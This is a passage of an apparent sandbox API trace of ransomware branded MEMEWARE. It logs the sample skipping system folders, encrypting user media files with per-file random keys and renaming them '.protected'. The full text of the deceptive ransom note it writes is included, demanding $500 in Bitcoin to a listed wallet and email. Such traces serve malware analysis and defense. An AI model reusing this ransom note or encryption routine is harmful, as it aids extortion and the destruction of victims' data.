HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.219] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.219] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0091.220] lstrlenA (lpString="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") returned 684 [0091.220] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0091.220] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.220] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0091.220] CloseHandle (hObject=0xd8) returned 1 [0091.220] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Windows") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Program Files") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="Program Files (x86)") returned -1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="$Recycle.bin") returned 1 [0091.220] lstrcmpiW (lpString1="mvNfPYUkR6OLy.wav", lpString2="System Volume Information") returned -1 [0091.220] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.220] StrStrIW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".protected") returned 0x0 [0091.220] lstrcmpW (lpString1="mvNfPYUkR6OLy.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) 
returned 1 [0091.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".txt") returned 0x0 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".rar") returned 0x0 [0091.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav") returned 88 [0091.221] StrStrW (lpFirst="mvNfPYUkR6OLy.wav", lpSrch=".zip") returned 0x0 [0091.221] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.222] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.222] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.222] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.222] CloseHandle (hObject=0xd8) returned 1 [0091.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav.protected") returned 98 [0091.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav.protected")) returned 1 [0091.223] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Windows") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Program Files") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Program Files (x86)") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="$Recycle.bin") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="System Volume Information") returned 1 [0091.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrIW (lpFirst="WNMhkej.gif", lpSrch=".protected") returned 0x0 [0091.223] lstrcmpW (lpString1="WNMhkej.gif", lpString2="RESTORE_FILES.txt") returned 1 [0091.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".txt") returned 0x0 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".rar") returned 0x0 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".zip") returned 0x0 [0091.223] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.224] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.224] WriteFile (in: 
hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.224] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.224] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.224] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.224] CloseHandle (hObject=0xd8) returned 1 [0091.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif.protected") returned 92 [0091.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif.protected")) returned 1 [0091.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.225] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\RESTORE_FILES.txt") returned 88 [0091.225] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.226] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.226] lstrlenA (lpString="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") returned 684 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.226] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0091.227] CloseHandle (hObject=0xd4) returned 1 [0091.227] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Windows") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Program Files") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Program Files (x86)") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="$Recycle.bin") returned 1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="System Volume Information") returned -1 [0091.227] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrIW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".protected") returned 0x0 [0091.227] lstrcmpW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) 
returned 1 [0091.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".txt") returned 0x0 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".rar") returned 0x0 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".zip") returned 0x0 [0091.228] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.228] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.228] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.229] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.229] WriteFile (in: 
hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.229] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.229] CloseHandle (hObject=0xd4) returned 1 [0091.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav.protected") returned 80 [0091.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav.protected")) returned 1 [0091.230] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.230] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Windows") returned -1 [0091.230] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Program Files") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Program Files (x86)") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="$Recycle.bin") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="System Volume Information") returned 1 [0091.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrIW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".protected") returned 0x0 [0091.231] lstrcmpW 
(lpString1="VRP9k1u4BimJGT.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".txt") returned 0x0 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".rar") returned 0x0 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".zip") returned 0x0 [0091.231] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.232] 
SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.233] CloseHandle (hObject=0xd4) returned 1 [0091.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3.protected") returned 78 [0091.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3.protected")) returned 1 [0091.234] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Windows") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Program Files") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Program Files (x86)") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="$Recycle.bin") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="System Volume Information") returned 1 [0091.234] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrIW 
